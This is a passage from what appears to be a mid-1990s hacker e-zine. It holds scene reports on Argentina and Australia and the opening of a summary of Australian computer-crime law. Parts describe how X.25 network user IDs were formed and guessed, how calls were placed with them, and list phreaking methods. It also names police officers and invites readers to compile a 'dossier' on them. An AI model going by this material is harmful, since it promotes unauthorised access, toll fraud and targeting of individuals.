  18203.      As for December 1993 this was calculated considering a fee of $0.007595/PTD
  18204.      and 1 PTD/min for leased lines + 4 PTD/min for dialup access. Also
  18205.      remember that those dialing from the PSTN are paying the local call
  18206.      too.
  18207.      There are discounts based on the day of week and hour of the
  18208.      connection:
  18209.      - Type "A" fee (normal fee)            Mon-Fri   06:00-20:00
  18210.      - Type "B" fee (40% discount)          Mon-Fri   20:00-24:00
  18211.      - Type "C" fee (60% discount)          Mon-Fri   24:00-06:00
  18212.                                             Sat.      20:00-06:00
  18213.                                             Sun. and
  18214.                                             Holidays  00:00-24:00
  18215.  
  18216.      International connections are not considered in this figure and are
  18217.      billed according to Telintar (LD carrier) fees.
  18218.      A 8% or 18% tax is applicable to all payments. Customers can also
  18219.      choose a fixed monthly payment instead of basic+traffic payments.
  18220.  
  18221.      The software used is that of ITAPAC (DNIC 2222) and as far as i know
  18222.      theres no support to mnemonics instead of the plain X.121 addressing.
  18223.      Nuas are DNIC+10 digit composed this way:
  18224.  
  18225.       [07222]XXXX YYYYY PP
  18226.              ^^^^\^^^^^\^^\__  port/subaddress
  18227.                    \     \
  18228.                      \     \_  host
  18229.                        \
  18230.                          \ __  corresponds to a "nodal area" in Startel's
  18231.                                jargon,usually associated with geographic
  18232.                                location.
  18233.                                Some valid entries here are:
  18234.                                 2111,2141,2171,2511,2211,2911,2172,2912...
  18235.  
  18236.     NUIs, IURs in Startel's babbling, are formed like this:
  18237.  
  18238.     9XXXXXXXX/YYYYYY
  18239.      ^^^^^^^^\^^^^^^\_ this is the password, normally 5/6 alphanumerics,
  18240.                \       all uppercase.
  18241.                  \
  18242.                    \__ da nui! X is in the [0-9] range and generally the whole
  18243.                        8 digits correspond to one of the subscriber's DNs.
  18244.  
  18245.     So if you were to use ARPAC you'd make a call by typing
  18246.  
  18247.        .. <enter> upon connection (7E1, <= 2.4kbds)
  18248.  
  18249.       then
  18250.  
  18251.        N9<XXXXXXXX>/<YYYYYY>-<nua>   ; when using a NUI. or
  18252.  
  18253.        <nua>                         ; w/o NUI needs Reverse Charge
  18254.                                      ; Acceptance of course.
  18255.  
  18256.     You don't wanna call them NUIs when talking to Startel personnel
  18257.     (i.e. social  engineering)  unless you want to become instantly suspected
  18258.     to be an evil phraudster (aka haq3R).
  18259.  
  18260.   "CIBA", The Infamous, or BT Tymnet's retarded child (DNIC==7220)
  18261.   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18262.     If you cared enough to read the BT Tymnet's worldwide dialups listing
  18263.     you probably noticed a few entries for Argentina. These were regularly
  18264.     used by "net explorers" in the mid 80's and were known as "CIBA" among
  18265.     them. CIBA dialups are 300bds (wow!) and use CCITT v.21 protocol (ATB0
  18266.     for your modem). At that time the fastest ARPAC dialup was 1200bds.
  18267.     All in all CIBA is nothing more than the door to BT Tymnet in
  18268.     Argentina (node 7407, host 1212). There's no direct access to interesting
  18269.     utilities such as "xray" and the likes.
  18270.     NUIs here were stupidly choosen and easily scanned since they followed
  18271.     two known patterns:
  18272.        naargXXXXna , and
  18273.        enargXXXnet  X being in the [0-9] range.
  18274.     Many of these were not passworded. Of course no one would even think to
  18275.     scan NUIs at 300bds nowadays...
  18276.  
  18277.   Internet
  18278.   ~~~~~~~~
  18279.  
  18280.     The Internet is rarely know and even less used in the student,
  18281.     professor, computer and communications professionals circles. It's a
  18282.     depressive experience to explain the workings of "telnet","rlogin","ftp"
  18283.     and such "eccentricities" to people who were supposed to know about them
  18284.     from their TCP/IP books, courses and lectures. You, reader, could
  18285.     allege that a networked unix system is enough to explain this, but
  18286.     despite the technical explanations, the political, economic and social
  18287.     implications of the Internet will remain unknown until a vast amount of
  18288.     persons actually USE and EXPERIENCE it. And I'm not talking about
  18289.     "Joe citizen" here, I'm talking about people that would actually NEED
  18290.     the net if they were to improve their work.
  18291.     It's like describing the taste of an apple to someone, he'll
  18292.     surely understand what you say but don't expect him to understand what
  18293.     it tastes like until he actually bites it.
  18294.  
  18295.     The Internet top level authority in Argentina is the Foreign Relations
  18296.     Ministry and its link to the rest of the world is sponsored by the
  18297.     'United Nations Development Programme'. 'whois' output follows:
  18298.  
  18299.      United Nations Development Programme (NET-ARNET)
  18300.         Ministerio de Relaciones Exteriores y Culto
  18301.         Reconquista 1088 ler. Piso - Informatica
  18302.         Buenos Aires
  18303.         ARGENTINA
  18304.  
  18305.         Netname: ARNET-NET
  18306.         Netnumber: 140.191.0.0
  18307.  
  18308.         Coordinator:
  18309.           Amodio, Jorge Marcelo  (JMA49)  PETE@ATINA.AR
  18310.           +54 1313 8082
  18311.  
  18312.         Domain System inverse mapping provided by:
  18313.  
  18314.           ATINA.AR   140.191.2.2
  18315.           ATHEA.AR   140.191.4.10
  18316.  
  18317.         Record last updated on 06-May-91.
  18318.  
  18319.     Argentina has only an UUCP link (well, once again this is just the publicly
  18320.     known info...) to the Internet through UUNET, connecting several uucp
  18321.     linked networks to it (RAN,RECYT,etc). Atina.ar is the most important
  18322.     host in this scheme, seconded by the Science and Technology Secretary's
  18323.     host (SECYT) and the University of Buenos Aires (UBA) host located at
  18324.     the Exact and Natural Sciencies Faculty in a dependency known as the
  18325.     "CCC".
  18326.     There's also a company the offers Internet connectivity bypassing atina
  18327.     and uunet. 'whois' output:
  18328.  
  18329.      SatLink Uucp/Internet (SATLINK-DOM)
  18330.         Casilla de Correo 3618
  18331.         (1000) Correo Central
  18332.         Buenos Aires
  18333.         ARGENTINA
  18334.  
  18335.         Domain Name: SATLINK.NET
  18336.  
  18337.         Administrative Contact, Technical Contact, Zone Contact:
  18338.           Stolovitzky, Horacio  (HS3)  postmaster@SATLINK.NET
  18339.           +54-1-983-6740
  18340.  
  18341.  
  18342.         Domain servers in listed order:
  18343.  
  18344.           NKOSI.WELL.SF.CA.US          192.132.30.4
  18345.           WELL.SF.CA.US                192.132.30.2
  18346.  
  18347.         Record last updated on 24-Mar-93.
  18348.  
  18349.     There are other links that bypass atina and uunet, all of them part of
  18350.     corporate networks. (i.e. IBM's VNET, etc)
  18351.  
  18352.     Although everyone says theres only a UUCP link to the Internet, word is
  18353.     that there are a few hidden 9600bds leased lines shared among many hosts
  18354.     at some sites, at any rate this is completely insufficient for servicing
  18355.     researchers, students and other interested parties, thus the existence
  18356.     of these links is kept as a sort of secret.
  18357.  
  18358.     64kbds links are supposed to be installed  for interactive sessions
  18359.     this year at certain sites.
  18360.  
  18361.   Other networks
  18362.   ~~~~~~~~~~~~~~
  18363.     Many companies form their corporate networks as CUGs on Arpac, have
  18364.     their own network, or both. Telcos, consulting firms, banks and
  18365.     insurance companies fall in these categories  and are quite interesting
  18366.     research projects for the inquisitive hacker.
  18367.  
  18368.  
  18369. The "Scene"
  18370. ~~~~~~~~~~~
  18371.     There's not much to say about the Argentinian scene. Given the cost
  18372.     and the time you have to wait to get a phone line installed there
  18373.     aren't many BBSes up 24hrs. Most of them are up during nighttime, from
  18374.     10:00/11:00 pm to 6:00/7:00am, of these, very, very few are dedicated to
  18375.     hack/phreak topics.
  18376.     Also, considering that theres no decent internet access at your local
  18377.     university you would be forced to explore X.25 networks in order to
  18378.     fulfill your natural interest and seek of knowledge.
  18379.     But there aren't many hackers either. Most Argentinians you'll find on
  18380.     the nets are mere abusers with one final goal: to get to QSD or the
  18381.     likes. While this sounds rather amusing (eh) there's an explanation to
  18382.     it.
  18383.     In the mid 80's a few Argentinians used to exploit CIBA's clueless
  18384.     procedures for choosing NUIs. At that time the fastest ARPAC dialup
  18385.     was 1200bds so 300bds was not that bad after all, and not bad at all
  18386.     as you were sure you could find a new NUI in a matter of hours.
  18387.     Yes, many people wasted their diminishing lifes in QSD, but for some this
  18388.     new x.25 thingie was more than a mean for meeting friends over the net
  18389.     and having endless chats with them, some needed to learn and understand
  18390.     the workings of the nets and the many different systems hooked to it.
  18391.     For those the place was Altos, and AMP (although you couldn't connect to
  18392.     PSS directly). And Altos proved to be of great help for Argentinians
  18393.     that got introduced to the hack/phreak world not on a BBS but right on a
  18394.     X.25 network. And so did the sequel of Korn-chat sites (tchh,lutzifer,
  18395.     italian "artemus") or even Pegasus and LINA sometimes.
  18396.     Around '89 or '90 an Efinet (Efinet == Fidonet wannabe) meeting was held,
  18397.     and during it someone gave out a "strange bunch of numbers in the form
  18398.     of some sort of code or something" (this being an ARPAC NUI followed by
  18399.     QSD's NUA) and the attendees ran home and tested it, just to see them
  18400.     connected to the France chat extrordinaire. Meanwhile, things were
  18401.     getting hot elsewhere in the world, and those once famous X.25 hangouts
  18402.     went virtually dead, so these newcomers wouldn't get in touch with
  18403.     Argentinian hackers (as they wouldn't appear in QSD) or other countries'
  18404.     hackers (as they were having a bad time or retiring or simply leaving
  18405.     X.25 alone). So, even if they wanted to learn, these freshmen, for good or
  18406.     for bad, were on their own and still are...
  18407.  
  18408.     The vast majority of the argentine society never heard the words "hacker"
  18409.     or "phreaker" or, if they did, they relate it to things happening in
  18410.     other countries, far, far away.
  18411.     It wasn't until '93, in accordance with the apparently boundless tendency to
  18412.     use the word "cybersomething" when referring to anything remotely related to
  18413.     new technologies, computers, or scifi novels or any other thing that
  18414.     requires publicity, i.e. see cyberIdol's cybershitty cyberCD to understand
  18415.     what I cybermean, uhg excuse me, back to the point...
  18416.     It wasn't until '92 or '93 that the media discovered this brilliant trend
  18417.     for selling more and more, apparently some genius said: "Hey, what if we
  18418.     sell the future? What if we write about how will life be, how  will
  18419.     technology be, how will the planet be, how will your dog be? All this
  18420.     with some vague journalistic odor of course. I bet we will sell more!".
  18421.     So they did, and in this frame the hacker/phreak scene is more like the
  18422.     salt to dress the salad, yet things didn't get to the extreme of
  18423.     sensationalism and hacking is portrayed as an activity bound to some
  18424.     new sort of romanticism, still things are very much confused, putting
  18425.     hackers, phreakers, crackers, pirates, virii authors and mere fraudsters all
  18426.     together in the same bag (yes, but what would you expect anyway?). Even some
  18427.     interviews to an ex-hacker (who now runs a data security firm), and a
  18428.     self proclaimed "expert" ( more a virus expert, IF anything) have
  18429.     appeared.
  18430.     On the other side,  many "eleet poseurs" have appeared too, but as one
  18431.     could expect, they are nothing more than mere poseurs and certainly not
  18432.     worth more than a phrase here.
  18433.  
  18434. Final Words!
  18435. ~~~~~~~~~~~~
  18436.     This is the 'scene' AS I SEE IT, i don't consider myself an enlightened
  18437.     entity, thus I acknowledge my description might not be objective nor
  18438.     complete (in fact it might be complete bullshit but, do I care? do YOU
  18439.     care?).
  18440.     Argentina is a country where lots of things are still there, waiting to
  18441.     be discovered, virgin beaches for you to explore and enjoy. Security is
  18442.     generally lax, and people is generally not security-aware and even less
  18443.     hacker-aware, trashing and social engineering are simple things that DO
  18444.     give many benefits.
  18445.     As far as I know theres no specific law dealing with computer related
  18446.     crimes (whatever that mean...), and as long as you don't get yourself
  18447.     involved in the traditional crime pictures you are pretty much safe.
  18448.     On the other hand, the bad and expensive phone service, the lack of
  18449.     internet connectivity and the limited number of BBSes dedicated to the
  18450.     so called "underground" (yes, I did it, I used the damned word, argh)
  18451.     make things tougher for newcomers.
  18452.  
  18453.     Perhaps the most interesting thing is that there's not much knowledge of
  18454.     what hacking/phreaking means and this gives us an unique opportunity to avoid
  18455.     misunderstandings and errors that occurred in other countries. Perhaps
  18456.     it is possible to influence people in a positive way, making them think
  18457.     about secrecy, security, privacy and responsibility issues. We are
  18458.     still free of Geraldos, we didn't suffer witch hunts ala Operation
  18459.     Sundevil, the words "hacker" and "phreaker" have not been demonized yet,
  18460.     although the Orwelian-way is common practice among the telcos, but
  18461.     nobody seem to give a fuck about this, or maybe nobody notice?.
  18462.  
  18463.     So, this is it, the file has come to an end and I think it's enough
  18464.     for an introduction, I did not cover cellular telephony nor satellite
  18465.     links and companies providing related services, I did not mention many
  18466.     other things but my intention was to write a description of how things
  18467.     are here, not a fucking encyclopedia.
  18468.  
  18469.     If you think that many topics are deliberately vague and not covered
  18470.     in deep, that some information might be not accurate or if you don't
  18471.     agree with anything I've stated you can contact me at:
  18472.  
  18473.           HBO            +541-788-4850 24hrs.
  18474.           Loser's joint  +541-658-7983 23:00-6:00 (GMT -3)
  18475.  
  18476.     Here's my PGP key. DO USE IT OR EXPECT NO REPLIES
  18477.  
  18478. -----BEGIN PGP PUBLIC KEY BLOCK-----
  18479. Version: 2.3a
  18480.  
  18481. mQCNAi1EBdUAAAEEAMdEmi+ajN/WIIvN3jjUQk/wb0CLsXe+K49fX8DuUXvUSpdJ
  18482. UCu8wFH82reJWttj3vaMQ/guKADC/VTIbfsRGWZhbvc+7Mb0W/3LPJSj5zpG9O+M
  18483. +XF6A7eB6IfncS+p9jU5Tb9lMc/H0BoW4VTpYO/eWK9DJGfAFOA/puxL3X5tAAUR
  18484. tB1PUGlpIDxvcGlpQGJpYXBiYS51YmEuZWR1LmFyPg==
  18485. =rKbG
  18486. -----END PGP PUBLIC KEY BLOCK-----
  18487.  
  18488. ------------------------------------------------------------------------------
  18489.  
  18490.                The
  18491.            Australian
  18492.            Underground
  18493.      ( or The lack thereof! )
  18494.  
  18495.                by
  18496.  
  18497.             Data King
  18498.  
  18499.  
  18500. ATTITUDE
  18501.  
  18502. For several years now the Australian underground scene has turned better yet
  18503. worse at the same time. The amount of companies and colleges using datacomm
  18504. has dramatically increased. In my opinion it is still not yet to the stage of
  18505. America in this respect though.
  18506.  
  18507. The number of 'hackers' has increased, but I use the term loosely as I do not
  18508. consider many of these so called 'hackers' to be hackers. Why do I say this?
  18509. I say this because most people who hang out in the underground scene in
  18510. Australia consider hacking to be getting an account at a university off of a
  18511. friend and then snarfing the password file and running crack over it. They are
  18512. only interested in things that will give them access to IRC, FTP & Newsgroups.
  18513. ( No flames please I am talking in general here! )
  18514.  
  18515. Many of them have never heard of services like MIDAS, Minerva & AUSTPAC and
  18516. even if they were given a dialup to one of these services I doubt they would
  18517. have a clue about how to use it. We have a wealth of services out there just
  18518. waiting to be tried, but there is almost no one who is interested in doing so,
  18519. to give you an example. One night I was working away on my box at about 3am and
  18520. a 'hacker' mate had crashed on the couch. I went to dial into one of the local
  18521. universities and I misdialed the number.  At first I didn't realize that I had
  18522. dialed the wrong number since I got a carrier. My modem connected and then just
  18523. sat there instead of the usual annex prompt. I bashed the old enter key a
  18524. few times and suddenly I was presented with a menu to an accounting system.
  18525.  
  18526. 'Sheet,' I thought, and screaming to wake my mate up ( at this stage I thought I
  18527. had connected to the university and it hadn't reset the line after the last user
  18528. hung up ) I started to explore the system, it soon became evident that it wasn't
  18529. the university but something entirely different, by this time my 'hacker' mate
  18530. had woken up. 'Whaaaaaaaaat?' comes the response from the couch, I briefly
  18531. explained what had transpired and his only response was 'Ughhhhh' as he went
  18532. back to sleep. Needless to say I spent the next 3 hours playing with the
  18533. system, and by the time I had finished I could crash the accounting menu and
  18534. exit to the operating system.
  18535.  
  18536. The system turned out to be fairly boring and proved to be of no use to me,
  18537. BUT I had to assume that before I knew, it could have been something really
  18538. interesting and to spend time fully exploring it, where as my 'hacker' mate
  18539. couldn't give a stuff, 'coz it wasn't on internet'.
  18540.  
  18541. TECHNIQUES
  18542.  
  18543. Australian Hackers no longer seem to be using advanced techniques to penetrate
  18544. a system, very few would have any idea how to use TCP/IP to gain access to a
  18545. system. Most satisfy themselves with obtaining an id elsewhere and then
  18546. snarfing the password file and running crack over it. When it comes to things
  18547. such as VMS the attitude I usually encounter is "VMS urgh, what bloody good
  18548. is it!". There are some very good Hackers in Australia but most of them do
  18549. not hang around in the underground scene, rather they are usually university
  18550. students who learn how to make the best use of the system. Writing things like
  18551. ICMP bombs, and Sniffers is usually left to these people, in fact I can not
  18552. think of any active non university student hacker who lives in Australia and
  18553. uses these sort of techniques.
  18554.  
  18555. CONS
  18556.  
  18557. To the best of my knowledge there has only ever been one underground conference
  18558. in Australia, and that was from memory in 1984, it was called Hackfest and it
  18559. was nothing compared to HOHOCON or Hacking at the End of the Universe.
  18560.  
  18561. At the time we all thought it was great, and I must admit it did boost the
  18562. sharing and finding of new info for a while.
  18563.  
  18564. I, in association with  one or two others, have been thinking of arranging
  18565. another Hackfest to be held in 1994, it will probably be held in Melbourne,
  18566. Australia. If you live in Australia and would like to attend then mail me
  18567. and I will keep you informed. ( Det. Sgt. Ken Day: Don't bother trying to
  18568. spy on Hackfest if it goes ahead, you're more than welcome to attend! )
  18569.  
  18570. NETWORKS
  18571.  
  18572. In Australia we have several national and international networks, here is a
  18573. list of some of them:
  18574.  
  18575. MIDAS       International Packet switching network DNIC = 5053
  18576. Minerva     Automated Office Network w/ International PSS
  18577. AUSTPAC     Australian Packet Switching Network DNIC = 5052
  18578. SprintNET   Need I explain this???
  18579. AARNET      The Australian Network that covers Internet in Australia
  18580. TRAN$END    Subset of Austpac ( used by Banks for ATM/EFTPOS transmissions )
  18581. Compuserve  Need I explain this???
  18582. Discovery   Australian Videotext system ( Not sure if still in Service )
  18583. ?????       The Australian Military Network ( Don't know its name )
  18584. TAXLAN      The Australian Tax Office ( IRS ) Network
  18585.  
  18586. PHREAKING
  18587.  
  18588. For years people in Australia believed that phreaking was only really possible
  18589. by pitting, this included Telecom Investigations Department, but we know that
  18590. this is not true. Methods that have been used in Australia include:
  18591.  
  18592. Blue Boxing off of an American Operator Line
  18593. Pitting ( ie: Linemans handset connected to a telecom junction box )
  18594. Clicking ( Electric shock to a public phone )
  18595. Boxing off of a disconnected number ( almost impossible now )
  18596. Calling Cards ( both American and now Australian Calling Cards )
  18597. PBX's ( 0014-800's and local PBX's )
  18598. Mobile Telephones ( ie Cellular Phones and b4 that the old Radio mobiles )
  18599.  
  18600. There are probably other methods as well but I am not a phreaker so I am not
  18601. the best person to comment on this. Boxing in Australia is getting dangerous
  18602. now as we are getting more and more of the new digital exchanges which make it
  18603. a lot easier to trace, or at least so I am told.
  18604.  
  18605. There were some people in South Australia making/recharging Telephone cards,
  18606. ( Like a disposable calling card, but you buy them in news agents and they
  18607. have a dollar value, once used up you throw them away ) but these people were
  18608. apparently caught and telecom have taken measures to ensure that this is no
  18609. longer possible.
  18610.  
  18611. VMB'S
  18612.  
  18613. We have a large range of VMBs in Australia, and with the proliferation of
  18614. VMBs has come the art of Hacking VMBs, we even have people here in Australia
  18615. that do virtually nothing else other than play with VMBs. These people tend
  18616. to go a lot further than just cracking the pin numbers, some of them have
  18617. learned enough about the signalling systems used by these systems to virtually
  18618. take control of the system and make it do what they want. Once again this is
  18619. an area that I do not know a lot about.
  18620.  
  18621. We also have a couple of individuals that run something called the Scene Inpho
  18622. line, Which essentially is a VMB with a long recorded message giving out tips,
  18623. rumors, and general rubbish. The number to the Scene Inpho Line unfortunately
  18624. constantly changes as the owners of the VMB notice what's going on and shut
  18625. that particular box down.
  18626.  
  18627. BULLETIN BOARDS
  18628.  
  18629. There are not a lot of good underground BBS's in Australia, a couple that I
  18630. know of that come to mind are Destiny Stone II, Empire of Darkness,
  18631. & Watchtower. I can not comment on Destiny Stone II as I have never called it.
  18632. However, when I used to called Empire of Darkness it was so lame it wasn't funny
  18633. and now he has gone 96+ only I can't call it ( I'm poor and can't afford a
  18634. new modem ;) ).
  18635.  
  18636. Watchtower showed potential but unfortunately the sysop of it is very slack and
  18637. needs to get off of his butt and do some work on it! The underground boards in
  18638. Australia tend to reflect the general state of the scene, ie: complete and total
  18639. apathy!
  18640.  
  18641. Most H/P boards in Australia are also warez sites and tend to be pretty lame and
  18642. insecure because of all the warez puppies on them, I can not think of a really
  18643. good board in Australia that is still operating.
  18644.  
  18645. BUSTS
  18646.  
  18647. In the last year the Australian Federal Police, Computer Crimes Unit has been
  18648. quite busy raiding people. As a result there have been 4 convictions that I
  18649. know of, and another 2 people waiting for charges to be laid.
  18650.  
  18651. The people convicted and there sentences are as follows:
  18652.  
  18653. Data King (me) Guilty but no record ( escaped conviction under section 19b of
  18654.                the act ) $300.00 fine and $500 2 year Good Behavior bond.
  18655.                ( Pleaded Guilty to 2 Charges )
  18656.  
  18657. Electron       6 Months Jail ( suspended sentence ), $500  6 Month Good
  18658.                Behavior bond, & 300 hours Community Service Work.
  18659.                ( Pleaded Guilty to 14 Charges )
  18660.  
  18661. Nom            6 Months Jail ( suspended sentence ), $500  6 Month Good
  18662.                Behavior bond, & 200 hours Community Service Work.
  18663.                ( Pleaded Guilty to 2 Charges )
  18664.  
  18665. Phoenix        12 Months Jail ( suspended sentence ), $1000 12 Month Good
  18666.                Behavior bond, & 500 hours Community Service Work.
  18667.                ( Pleaded guilty to 15 Charges )
  18668.  
  18669. In the most part people get busted in Australia due to either their stupidity
  18670. ( Hi Phoenix! ), being lagged in by some low life, or by trusting someone they
  18671. should not of ( Hi Phoenix! ).
  18672.  
  18673. LEGALITIES
  18674.  
  18675. Both Hacking and Phreaking have been illegal in Australia for quite a few years
  18676. I will not go into details here as hopefully there will be an article in this
  18677. issue of Phrack covering the laws and possible penalties.
  18678.  
  18679. Computer Crime in Australia is the responsibility of the Australian Federal
  18680. Police Computer Crimes Unit. The people known to us in this unit are:
  18681.  
  18682. Det. Sgt. Ken Day
  18683. Det. Neil Campbell
  18684. Det. Steve Visic
  18685.  
  18686. ( Sorry guys if I spelled your names wrong - NOT! ;) )
  18687.  
  18688. If you are able to add any names to the list, please mail them to me and any
  18689. other info you have on them. That way we can begin to build up a dossier on
  18690. our enemies!
  18691.  
  18692. PUBLIC
  18693.  
  18694. There seems to be a growing awareness in the general populace of Australia.
  18695. There has been quite a bit of media hype on hacking over the last year, and
  18696. slowly the public seems to be getting a great fear of hackers. To me it seems
  18697. ridiculous, as the only real hackers that the public should have feared lived
  18698. in the early 80's. Today's generation of Australian hackers are pretty HOPELESS
  18699. in my humble opinion. To give an example, when Electron, Nom, & Phoenix's court
  18700. cases were getting media attention I was sitting in my parent's lounge room one
  18701. night when the news was covering their sentencing. My father thought that
  18702. these people were very dangerous and should have gotten a bigger sentence than
  18703. they did.  At this time he did not know about my bust. I have explained it to
  18704. him now but he still doesn't seem to understand...oh well that life I guess.
  18705.  
  18706. CONCLUSION
  18707.  
  18708. This is how I see the Australian scene, If you disagree, want to comment, send
  18709. me info for future articles, get on the hackfest mailing list, or just want to
  18710. have a chat you can mail me at:
  18711.  
  18712.    dking@suburbia.apana.org.au
  18713.  
  18714. If you require privacy you can send me stuff that is encoded via pgp, my
  18715. pgp public key is as follows:
  18716.  
  18717. -----BEGIN PGP PUBLIC KEY BLOCK-----
  18718. Version: 2.0
  18719.  
  18720. mQCNAi0t3M4AAAEEAMPZMexyZ+Nxz8Ry1w9R7pTLFGM7xk0MwJ/izS687UIJLzc5
  18721. l38jFM0bEcuSukRrLkBYIDdiAgOdn50cJmKOPyvE4FvR2eh2dbdHyFKzaVWVe5zE
  18722. HZhNx2o0kb6SRIQHu8Vh/pkl+S29RKzDbIgMLLjOCwN0V1/RUal4ROOqDaCbAAUT
  18723. tCdEYXRhIEtpbmcgPGRraW5nQHN1YnVyYmlhLmFwYW5hLm9yZy5hdT4=
  18724. =ttmq
  18725. -----END PGP PUBLIC KEY BLOCK-----
  18726.  
  18727.  
  18728. I can also usually be found on IRC a couple of hours a night in these channels
  18729. under the nick of dking:
  18730.  
  18731.  #apana  #hack  #phreak  #linux
  18732.  
  18733.  
  18734. Thanks for assistance with this file go to:
  18735.  
  18736.            SPiN-DoC        Olorin
  18737.  
  18738.                       &
  18739.  
  18740.                 Connie Lingus
  18741.        ( Motivational Support - <SMILE> )
  18742.  
  18743. Have phun, and remember:
  18744.  
  18745.       BE CAREFUL OUT THERE!
  18746.  
  18747.  ==============================================================================
  18748.  
  18749.               ()()()()()()()()()()()()()()()()()()()()()()()()()
  18750.               ()                                              ()
  18751.               ()          "Australian Hacking Laws"           ()
  18752.               ()                                              ()
  18753.               ()                 21/01/93                     ()
  18754.               ()                                              ()
  18755.               ()                            (c) Data King     ()
  18756.               ()                                              ()
  18757.               ()()()()()()()()()()()()()()()()()()()()()()()()()
  18758.  
  18759.  
  18760.                      Crimes Act 1914 (Commonwealth)
  18761.                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18762.  
  18763. Part VIA - Offences Relating to Computers
  18764.  
  18765. Section 19B (1) Order & Recognizance
  18766.  
  18767. The Court can discharge you under this section, with a surety and/or
  18768. recognizance given by you.
  18769.  
  18770. If discharged under this section you may be put on a good behavior bond
  18771. of up to but not exceeding 2 years. Other conditions may be placed on you
  18772. by the court also, this conditions can be anything that the court considers
  18773. appropriate.
  18774.  
  18775. To have this section come into effect the following must apply:
  18776.  
  18777. The Court is satisfied that the charge(s) are proved, but is of the opinion,
  18778. having regard to:
  18779.  
  18780.  The Character, Antecedents, Age, Health, & Mental Condition
  18781.  
  18782. that it is unexpedient to inflict any punishment or any punishment other
  18783. than a nominal one on you.
  18784.  
  18785. Basically what this means is that you can be found guilty and not have a
  18786. conviction recorded against your name, but you must realign that the
  18787. department of public prosecutions may object to this and then you will have
  18788. to try and convince the Judge to ignore what the DPP says, (not easy).
  18789.  
  18790. Also please realign that if you were to receive a section 19B and then were
  18791. caught doing naughty things again and you are still under your good behavior
  18792. bond, you will forfeit your bond and have to stand trial again for the
  18793. original offence(s).
  18794.  
  18795. Section 74A - Interpretation
  18796.  
  18797. (1) In this part, unless the contrary intention appears:
  18798.  
  18799. "carrier" means:
  18800.  
  18801.         (a) a general carrier within the meaning of the Telecommunications
  18802.         Act 1991; or
  18803.  
  18804.         (b) a mobile carrier within the meaning of that Act; or
  18805.  
  18806.         (c) a person who supplies eligible services within the meaning of
  18807.         that Act under a class licence issued under section 209 of that Act;
  18808.  
  18809. "Commonwealth" includes a public authority under the Commonwealth;
  18810.  
  18811. "Commonwealth computer" means a computer, a computer system or a part of a
  18812. computer system owned, leased or operated by the Commonwealth;
  18813.  
  18814. "Data" includes information, a computer program or part of a computer program.
  18815.  
  18816. (2) In this Part;
  18817.  
  18818.         (a) a reference to data stored in a computer includes a reference to
  18819.         data entered or copied into the computer; and
  18820.  
  18821.         (b) a reference to data stored on behalf of the Commonwealth in a
  18822.         computer includes a reference to:
  18823.  
  18824.                 (i) data stored in the computer at the direction or request
  18825.                 of the Commonwealth; and
  18826.  
  18827.                 (ii) data supplied by the Commonwealth that is stored in the
  18828.                 computer under, or in the course of performing, a contract
  18829.                 with the Commonwealth.
  18830.  
  18831.  
  18832. Section 76B - Unlawful access to data in Commonwealth or other computers
  18833.  
  18834. (1) A person who intentionally and without authority obtains access to:
  18835.  
  18836.         (a) data stored in a Commonwealth computer; or
  18837.  
  18838.         (b) data stored on behalf of the Commonwealth in a computer that
  18839.         is not a Commonwealth computer;
  18840.  
  18841. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 6 months
  18842.  
  18843. (2) A person who
  18844.  
  18845.         (a) with intent to defraud any person and without authority obtains
  18846.         access to data stored in a Commonwealth computer, or to data stored on
  18847.         behalf of the Commonwealth in a computer that is not a Commonwealth
  18848.         computer; or
  18849.  
  18850.         (b) intentionally and without authority obtains access to data stored
  18851.         in a Commonwealth computer, or to data stored on behalf of the
  18852.         Commonwealth in a computer that is not a Commonwealth computer, being
  18853.         data that the person knows or ought reasonably to know relates to:
  18854.  
  18855.                 (i) the security, defense or international relations of
  18856.                 Australia;
  18857.  
  18858.                 (ii) the existence or identity of a confidential source of
  18859.                 information relating to the enforcement of a criminal law of
  18860.                 the Commonwealth or of a State or Territory;
  18861.  
  18862.                 (iii) the enforcement of a law of the Commonwealth or of a
  18863.                 State or Territory;
  18864.  
  18865.                 (iv) the protection of public safety;
  18866.  
  18867.                 (v) the personal affairs of any person;
  18868.  
  18869.                 (vi) trade secrets;
  18870.  
  18871.                 (vii) records of a financial institution; or
  18872.  
  18873.                 (viii) commercial information the disclosure of which could
  18874.                 cause advantage or disadvantage to any person;
  18875.  
  18876. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years
  18877.  
  18878. (3) A person who:
  18879.  
  18880.         (a) has intentionally and without authority obtained access to data
  18881.         stored in a Commonwealth computer, or to data stored on behalf of the
  18882.         Commonwealth in a computer that is not a Commonwealth computer;
  18883.  
  18884.         (b) after examining part of that data, knows or ought reasonably
  18885.         to know that the part of the data which the person examined relates
  18886.         wholly or partly to any of the matters referred to in paragraph
  18887.         (2)(b); and
  18888.  
  18889.         (c) continues to examine that data;
  18890.  
  18891. IS GUILTY OF AN OFFENCE - PENALTY: for contravention of this subsection:
  18892.                                    Imprisonment for 2 years
  18893.  
  18894. Section 76C - Damaging data in Commonwealth and other computers
  18895.  
  18896. A person who intentionally and without authority or lawful excuse:
  18897.  
  18898.         (a) destroys, erases or alters data stored in, or inserts data into a
  18899.         Commonwealth computer;
  18900.  
  18901.         (b) interferes with, or interrupts or obstructs the lawful use of a
  18902.         Commonwealth computer;
  18903.  
  18904.         (c) destroys, erases, alters or adds to data stored on behalf of the
  18905.         Commonwealth in a computer that is not a Commonwealth computer; or
  18906.  
  18907.         (d) impedes or prevents access to, or impairs the usefulness or
  18908.         effectiveness of, data stored in a Commonwealth computer or data stored
  18909.         on behalf of the Commonwealth in a computer that is not a Commonwealth
  18910.         computer;
  18911.  
  18912. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 10 years
  18913.  
  18914. Section 76D - Unlawful access to data in Commonwealth and other computers by
  18915.               means of certain facilities.
  18916.  
  18917. (1) A person who, by means of a facility operated or provided by the
  18918. Commonwealth or by a carrier, intentionally and without authority obtains
  18919. access to data stored in a computer.
  18920.  
  18921. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 6 months
  18922.  
  18923. (2) A person who:
  18924.  
  18925.         (a) by means of a facility operated or provided by the Commonwealth
  18926.         or by a carrier, with intent to defraud any person and without
  18927.         authority obtains access to data stored in a computer; or
  18928.  
  18929.         (b) by means of such a facility, intentionally and without authority
  18930.         obtains access to data stored in a computer, being data that the
